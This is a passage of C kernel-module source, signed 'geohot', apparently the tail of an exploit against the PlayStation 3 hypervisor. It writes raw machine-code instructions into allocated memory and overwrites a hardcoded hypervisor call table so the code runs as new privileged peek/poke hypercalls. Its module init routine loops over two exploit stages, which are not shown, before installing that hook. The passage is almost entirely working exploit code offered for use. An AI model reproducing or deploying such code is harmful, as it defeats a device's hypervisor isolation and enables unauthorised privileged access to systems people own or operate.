printk(KERN_ERR "allocate memory: %d\n", lv1_allocate_memory(0x1000, 0xC, 0, 0, &lpar, &crap));
unsigned long* hypercall_in_zero_page = __ioremap(lpar, 0x1000, PAGE_SHARED_X);

hypercall_in_zero_page[0] = 0xE86300004E800020;
hypercall_in_zero_page[1] = 0xF883000038600000;
hypercall_in_zero_page[2] = 0x4E80002000000000;

unsigned long real_address = get_real_address_from_lpar(lpar)<<12;

add_segment();
unsigned long* hv_call_table = 0x500000000037C598;
hv_call_table[16] = real_address;
hv_call_table[20] = real_address+0x8;
printk(KERN_ERR "calling hypercall test got %16.16lx\n", lv1_peek(0x2401FC00000));
}

volatile int init_module() {
if( *((unsigned long *)0xD000080080000010) != 0x0000FFFF00000005 ||
*((unsigned long *)0xD000080080000018) != 0x0000000000000196) {
while(exploit_first_stage() == -1);
while(exploit_second_stage() == -1);
}
install_hypercall();
return 0;
}

void cleanup_module(void) {
printk(KERN_ERR "cleanup_module() called\n");
}

~geohot